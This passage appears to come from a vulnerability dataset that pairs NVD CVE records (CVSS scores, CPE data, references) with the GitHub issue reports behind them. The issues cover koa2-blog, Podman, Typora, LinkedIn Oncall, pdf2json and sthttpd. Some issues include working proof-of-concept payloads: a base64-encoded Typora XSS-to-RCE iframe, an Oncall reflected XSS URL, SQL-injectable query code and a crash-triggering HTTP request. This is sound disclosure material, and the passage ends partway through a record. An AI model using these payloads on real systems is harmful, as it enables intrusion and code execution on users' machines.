"criteria": "cpe:2.3:a:koa2-blog_project:koa2-blog:1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "43A986EE-B5A7-4972-9AEC-4E04F5DAA875",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/wclimb/Koa2-blog/issues/40 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wclimb",
"Koa2-blog"
] | A sql injection was discovered in koa2-blog 1.0.0 .There is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via:
`post http://127.0.0.1:3000/signin`
Vulnerability code
```
// 通过名字查找用户
exports.findDataByName = ( name ) => {
let _sql = `select * from users where name="${name}";`
return query( _sql)
}
```
POC
Trigger SQL injection vulnerability by signin,we can see that the injected statement executed successfully and the page response timed out for 5S

| koa2-blog v1.0.0 sql injection vulnerability | https://api.github.com/repos/wunci/Koa2-blog/issues/40/comments | 0 | 2019-11-28T07:35:07Z | 2019-11-30T09:03:38Z | https://github.com/wunci/Koa2-blog/issues/40 | 529,741,727 | 40 | 1,675 |
CVE-2020-21180 | 2021-02-01T18:15:13.390 | Sql injection vulnerability in koa2-blog 1.0.0 allows remote attackers to Injecting a malicious SQL statement via the name parameter to the signup page. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wclimb/Koa2-blog/issues/41"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wclimb/Koa2-blog/issues/41"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koa2-blog_project:koa2-blog:1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "43A986EE-B5A7-4972-9AEC-4E04F5DAA875",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/wclimb/Koa2-blog/issues/41 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wclimb",
"Koa2-blog"
] | A sql injection was discovered in koa2-blog 1.0.0 .There is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via:
`post http://127.0.0.1:3000/signup`
Vulnerability code
```
// 通过名字查找用户数量判断是否已经存在
exports.findDataCountByName = ( name ) => {
let _sql = `select count(*) as count from users where name="${name}";`
return query( _sql)
}
}
```
POC
Trigger SQL injection vulnerability by registering new users,we can see that the injected statement executed successfully and the page response timed out for 7S


| koa2-blog v1.0.0 sql injection vulnerability | https://api.github.com/repos/wunci/Koa2-blog/issues/41/comments | 0 | 2019-11-28T07:53:03Z | 2019-11-30T09:04:06Z | https://github.com/wunci/Koa2-blog/issues/41 | 529,748,271 | 41 | 1,676 |
CVE-2021-20199 | 2021-02-02T19:15:14.000 | Rootless containers run with Podman, receive all traffic with a source IP address of 127.0.0.1 (including from remote hosts). This impacts containerized applications that trust localhost (127.0.01) connections by default and do not require authentication. This issue affects Podman 1.8.0 onwards. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1919050"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/containers/podman/issues/5138"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/containers/podman/pull/9052"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rootless-containers/rootlesskit/pull/206"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1919050"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/containers/podman/issues/5138"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/containers/podman/pull/9052"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rootless-containers/rootlesskit/pull/206"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:podman_project:podman:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3720247B-439B-4853-9312-87AFBB4B763D",
"versionEndExcluding": "3.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.8.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"346"
] | 346 | https://github.com/containers/podman/issues/5138 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"containers",
"podman"
] | /kind bug
**Description**
For a rootless container the source IP of incoming packets on a publish port is always `127.0.0.1`. Even if the request is made from an external host.
**Steps to reproduce the issue:**
1. Start a NGINX container:
```
machine-1$ podman run -p 8888:80 docker.io/library/nginx:latest
```
2. Make a request from another node.
```
machine-2$ curl http://machine-1:8888
```
3. Look at the source ip of the request in NGINX stdout log:
```
127.0.0.1 - - [09/Feb/2020:21:54:17 +0000] "GET / HTTP/1.1" 200 612 "-" "curl/7.66.0" "-"
```
**Describe the results you received:**
The logged source address is always 127.0.0.1
**Describe the results you expected:**
The logged source ip address to match the ip of the host the request was coming from.
**Additional information you deem important (e.g. issue happens only occasionally):**
In Podman 1.7 this worked as expected. And it's probably related to:
> Rootless Podman now uses Rootlesskit for port forwarding, which should greatly improve performance and capabilities
**Output of `podman version`:**
```
Version: 1.8.0
RemoteAPI Version: 1
Go Version: go1.13.6
OS/Arch: linux/amd64
```
**Output of `podman info --debug`:**
```
debug:
compiler: gc
git commit: ""
go version: go1.13.6
podman version: 1.8.0
host:
BuildahVersion: 1.13.1
CgroupVersion: v2
Conmon:
package: conmon-2.0.10-2.fc31.x86_64
path: /usr/libexec/crio/conmon
version: 'conmon version 2.0.10, commit: 6b526d9888abb86b9e7de7dfdeec0da98ad32ee0'
Distribution:
distribution: fedora
version: "31"
IDMappings:
gidmap:
- container_id: 0
host_id: 1000
size: 1
- container_id: 1
host_id: 100000
size: 65536
uidmap:
- container_id: 0
host_id: 1000
size: 1
- container_id: 1
host_id: 100000
size: 65536
MemFree: 239222784
MemTotal: 16487555072
OCIRuntime:
name: crun
package: crun-0.12.1-1.fc31.x86_64
path: /usr/bin/crun
version: |-
crun version 0.12.1
commit: df5f2b2369b3d9f36d175e1183b26e5cee55dd0a
spec: 1.0.0
+SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +YAJL
SwapFree: 8187277312
SwapTotal: 8329883648
arch: amd64
cpus: 8
eventlogger: journald
hostname: prefect
kernel: 5.4.17-200.fc31.x86_64
os: linux
rootless: true
slirp4netns:
Executable: /usr/bin/slirp4netns
Package: slirp4netns-0.4.0-20.1.dev.gitbbd6f25.fc31.x86_64
Version: |-
slirp4netns version 0.4.0-beta.3+dev
commit: bbd6f25c70d5db2a1cd3bfb0416a8db99a75ed7e
uptime: 1h 17m 29.71s (Approximately 0.04 days)
registries:
search:
- docker.io
- registry.fedoraproject.org
- registry.access.redhat.com
- registry.centos.org
- quay.io
store:
ConfigFile: /home/bas/.config/containers/storage.conf
ContainerStore:
number: 22
GraphDriverName: overlay
GraphOptions:
overlay.mount_program:
Executable: /usr/bin/fuse-overlayfs
Package: fuse-overlayfs-0.7.5-2.fc31.x86_64
Version: |-
fusermount3 version: 3.6.2
fuse-overlayfs: version 0.7.5
FUSE library version 3.6.2
using FUSE kernel interface version 7.29
GraphRoot: /var/home/bas/.local/share/containers/storage
GraphStatus:
Backing Filesystem: extfs
Native Overlay Diff: "false"
Supports d_type: "true"
Using metacopy: "false"
ImageStore:
number: 232
RunRoot: /run/user/1000
VolumePath: /var/home/bas/.local/share/containers/storage/volumes
```
**Package info (e.g. output of `rpm -q podman` or `apt list podman`):**
```
podman-1.8.0-2.fc31.x86_64
```
**Additional environment details (AWS, VirtualBox, physical, etc.):**
Silverblue 31.20200209.0 (Workstation Edition) | Source IP always 127.0.0.1 in rootless Podman 1.8.0 | https://api.github.com/repos/containers/podman/issues/5138/comments | 25 | 2020-02-09T22:06:10Z | 2023-09-22T10:31:42Z | https://github.com/containers/podman/issues/5138 | 562,247,505 | 5,138 | 1,677 |
CVE-2020-18737 | 2021-02-05T16:15:12.430 | An issue was discovered in Typora 0.9.67. There is an XSS vulnerability that causes Remote Code Execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/typora/typora-issues/issues/2289"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/typora/typora-issues/issues/2289"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:typora:typora:0.9.67:-:*:*:*:*:*:*",
"matchCriteriaId": "A33C7DD4-B303-4247-A3B5-D54B5C767089",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/typora/typora-issues/issues/2289 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"typora",
"typora-issues"
] | Tested On Windows 10
Version : 0.9.67

XSS:
>```mermaid
graph LR
id1["<iframe src=javascript:alert('xss')></iframe>"]
```

RCE:
>```mermaid
graph LR
id1["<iframe src=javascript:eval(atob('dmFyIFByb2Nlc3MgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmJpbmRpbmcoJ3Byb2Nlc3Nfd3JhcCcpLlByb2Nlc3M7CnZhciBwcm9jID0gbmV3IFByb2Nlc3MoKTsKcHJvYy5vbmV4aXQgPSBmdW5jdGlvbiAoYSwgYikge307CnZhciBlbnYgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmVudjsKdmFyIGVudl8gPSBbXTsKZm9yICh2YXIga2V5IGluIGVudikgZW52Xy5wdXNoKGtleSArICc9JyArIGVudltrZXldKTsKcHJvYy5zcGF3bih7CiAgICBmaWxlOiAnY21kLmV4ZScsCiAgICBhcmdzOiBbJy9rIGNhbGMnXSwKICAgIGN3ZDogbnVsbCwKICAgIHdpbmRvd3NWZXJiYXRpbUFyZ3VtZW50czogZmFsc2UsCiAgICBkZXRhY2hlZDogZmFsc2UsCiAgICBlbnZQYWlyczogZW52XywKICAgIHN0ZGlvOiBbewogICAgICAgIHR5cGU6ICdpZ25vcmUnCiAgICB9LCB7CiAgICAgICAgdHlwZTogJ2lnbm9yZScKICAgIH0sIHsKICAgICAgICB0eXBlOiAnaWdub3JlJwogICAgfV0KfSk7'))></iframe>"]
```

[poc.zip](https://github.com/typora/typora-issues/files/2975000/poc.zip)
| Typora(v0.9.67) XSS to RCE | https://api.github.com/repos/typora/typora-issues/issues/2289/comments | 1 | 2019-03-17T10:04:54Z | 2019-03-21T02:40:40Z | https://github.com/typora/typora-issues/issues/2289 | 421,904,266 | 2,289 | 1,678 |
CVE-2021-26722 | 2021-02-05T18:15:12.690 | LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/linkedin/oncall/issues/341"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/linkedin/oncall/issues/341"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linkedin:oncall:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DCD66815-E6CB-43FE-8F10-F1F1ABEADCEE",
"versionEndExcluding": null,
"versionEndIncluding": "1.4.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/linkedin/oncall/issues/341 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"linkedin",
"oncall"
] | Hi!
I've found a reflected cross-site scripting vulnerability in Oncall's search bar. I've reported this issue to the LinkedIn Information Security Response Center back in September 2020 but Oncall still seems vulnerable to this date. Therefore I decided to report it here.
### Reproduction
1. Navigate to `http://[OnCallHost]/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all`
2. Click on the search bar where it now says `<img src=x onerror=alert(document.domain)>`
### Result
By clicking the search bar, a search will be done to the search API endpoint. Because nothing can be found a `No results found for "<img src="x" onerror="alert(document.domain)">"` message will be shown. Because this message includes the search query and lacks the proper HTML output encoding, the query is interpreted as HTML/JS and an alert containing the `document.domain` is shown.

### Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:
* Steal the user's credentials by altering the working of the displayed login form.
* Perform any action within the application that the user can perform.
* View any information that the user is able to view.
* Modify any information that the user is able to modify.
### Mitigation
In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures:
* **Filter input on arrival.** At the point where user input is received, filter as strictly as possible based on what is expected or valid input.
* **Encode data on output.** At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.
* **Content Security Policy.** As a last line of defense, you could use a (default) Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur. | [CVE-2021-26722] Reflected Cross-Site Scripting in search bar. | https://api.github.com/repos/linkedin/oncall/issues/341/comments | 3 | 2021-02-05T11:56:10Z | 2021-02-05T23:32:07Z | https://github.com/linkedin/oncall/issues/341 | 802,105,883 | 341 | 1,679 |
CVE-2020-18750 | 2021-02-05T19:15:11.917 | Buffer overflow in pdf2json 0.69 allows local users to execute arbitrary code by converting a crafted PDF file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flexpaper/pdf2json/commit/80bf71f16c804108fd933e267fe31692aaa509b4"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/flexpaper/pdf2json/issues/22"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flexpaper/pdf2json/commit/80bf71f16c804108fd933e267fe31692aaa509b4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/flexpaper/pdf2json/issues/22"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flowpaper:pdf2json:0.69:*:*:*:*:*:*:*",
"matchCriteriaId": "2F7376EA-8894-4F38-9B0E-E74BD2639130",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/flexpaper/pdf2json/issues/22 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"flexpaper",
"pdf2json"
] | In CharCodeToUnicode.cc::264
!pst->getToken(tok3, sizeof(tok3), &n3) || //sizeof(tok3) == 256
here n3 can be a value from 0 to 256 - 2
In CharCodeToUnicode.cc::298
addMapping(code1, tok3 + 1, n3 - 2, i);
In CharCodeToUnicode.cc::313
if (n <= 4) {
if (sscanf(uStr, "%x", &u) != 1) {
error(-1, "Illegal entry in ToUnicode CMap");
return;
}
map[code] = u + offset;
} else {
if (sMapLen >= sMapSize) {
sMapSize = sMapSize + 16;
sMap = (CharCodeToUnicodeString *)
greallocn(sMap, sMapSize, sizeof(CharCodeToUnicodeString));
}
map[code] = 0;
sMap[sMapLen].c = code;
sMap[sMapLen].len = n / 4;
The parameter n of void CharCodeToUnicode::addMapping(CharCode code, char *uStr, int n, int offset) can be a bigger value than the the limited value maxUnicodeString
In CharCodeToUnicode.cc::350
sMap[sMapLen].u[sMap[sMapLen].len - 1] += offset;
Using the sample pdf file , we can find the VUL clearly.
sMapLen = 0xf
sMap = 0x6f56f0
pwndbg> p sMap[0xf]
$8 = {
c = 51,
u = {0, 17039378, 4784134, 7208965, 2686984, 14, 542, 185},
len = 12
}
pwndbg> p sMap[sMapLen].len
$9 = 12
so sMap[sMapLen].len - 1 = 13, which makes the array Unicode u[maxUnicodeString]; as follows oob write.
#define maxUnicodeString 8
struct CharCodeToUnicodeString {
CharCode c;
Unicode u[maxUnicodeString];
int len;
};
So, we can modify memory from offset 0 to 63 * 4 with type unsigned int by adding the original value with offset, which can still be controlled. Local command execution is possible using heap fengshui, especially in the linux machine using glibc version > 2.6. Free a chunk using the bigger fake size can lead to continuously heap buf overflow, which can make the hacker get a memory containing the function pointer and then achieve the purpose of command execution.
| HEAP OVERFLOW VULNERABILITY | https://api.github.com/repos/flexpaper/pdf2json/issues/22/comments | 4 | 2019-03-20T02:55:13Z | 2019-03-23T07:08:58Z | https://github.com/flexpaper/pdf2json/issues/22 | 423,042,193 | 22 | 1,680 |
CVE-2021-26843 | 2021-02-07T21:15:11.790 | An issue was discovered in sthttpd through 2.27.1. On systems where the strcpy function is implemented with memcpy, the de_dotdot function may cause a Denial-of-Service (daemon crash) due to overlapping memory ranges being passed to memcpy. This can triggered with an HTTP GET request for a crafted filename. NOTE: this is similar to CVE-2017-10671, but occurs in a different part of the de_dotdot function. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/blueness/sthttpd/issues/14"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/blueness/sthttpd/issues/14"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sthttpd_project:sthttpd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A20AC738-9C0B-480E-8C76-37DB8BC6A098",
"versionEndExcluding": null,
"versionEndIncluding": "2.27.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"119"
] | 119 | https://github.com/blueness/sthttpd/issues/14 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"blueness",
"sthttpd"
] | When building sthttpd with ASAN (`-fsanitize=address`) I noticed a number of crashes with trivial requests such as the following:
```
GET //../HTTP/1.1\r\n\r\n
```
The problem is most visible on systems where `strcpy` is implemented using `memcpy` (e.g. GLIBC and macOS), here we end up with `memcpy` on overlapping memory ranges:
```
% ./thttpd.asan -p 8080 -d www -D -l -
=================================================================
==3926288==ERROR: AddressSanitizer: strcpy-param-overlap: memory ranges [0x611000000180,0x611000000189) and [0x611000000184, 0x61100000018d) overlap
#0 0x4850ba in strcpy (/home/jasper/sthttpd/thttpd.asan+0x4850ba)
#1 0x4d5532 in de_dotdot /home/jasper/sthttpd/src/libhttpd.c:2425:9
#2 0x4d3961 in httpd_parse_request /home/jasper/sthttpd/src/libhttpd.c:2040:5
#3 0x4cce31 in handle_read /home/jasper/sthttpd/src/thttpd.c:1646:10
#4 0x4c9fa0 in main /home/jasper/sthttpd/src/thttpd.c:809:26
#5 0x7f7c99f75d09 in __libc_start_main csu/../csu/libc-start.c:308:16
#6 0x41f569 in _start (/home/jasper/sthttpd/thttpd.asan+0x41f569)
0x611000000180 is located 0 bytes inside of 201-byte region [0x611000000180,0x611000000249)
allocated by thread T0 here:
#0 0x4995dd in malloc (/home/jasper/sthttpd/thttpd.asan+0x4995dd)
#1 0x4d162e in httpd_realloc_str /home/jasper/sthttpd/src/libhttpd.c:701:10
#2 0x4cc4e0 in handle_newconnect /home/jasper/sthttpd/src/thttpd.c:1550:11
0x611000000184 is located 4 bytes inside of 201-byte region [0x611000000180,0x611000000249)
allocated by thread T0 here:
#0 0x4995dd in malloc (/home/jasper/sthttpd/thttpd.asan+0x4995dd)
#1 0x4d162e in httpd_realloc_str /home/jasper/sthttpd/src/libhttpd.c:701:10
#2 0x4cc4e0 in handle_newconnect /home/jasper/sthttpd/src/thttpd.c:1550:11
SUMMARY: AddressSanitizer: strcpy-param-overlap (/home/jasper/sthttpd/thttpd.asan+0x4850ba) in strcpy
==3926288==ABORTING
```
Regardless of whether the server crashes, the behaviour of `strcpy` with overlapping source and destination is warned against in the manpage as the resulting behaviour is undefined. As the trace above shows, the offending call happens from https://github.com/blueness/sthttpd/blob/master/src/libhttpd.c#L2406 | Potential memory corruption/crash due to overlapping strcpy arguments | https://api.github.com/repos/blueness/sthttpd/issues/14/comments | 1 | 2021-01-26T20:14:02Z | 2021-02-08T08:40:46Z | https://github.com/blueness/sthttpd/issues/14 | 794,529,041 | 14 | 1,682 |
CVE-2020-35700 | 2021-02-08T09:15:12.463 | A second-order SQL injection issue in Widgets/TopDevicesController.php (aka the Top Devices dashboard widget) of LibreNMS before 21.1.0 allows remote authenticated attackers to execute arbitrary SQL commands via the sort_order parameter against the /ajax/form/widget-settings endpoint. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
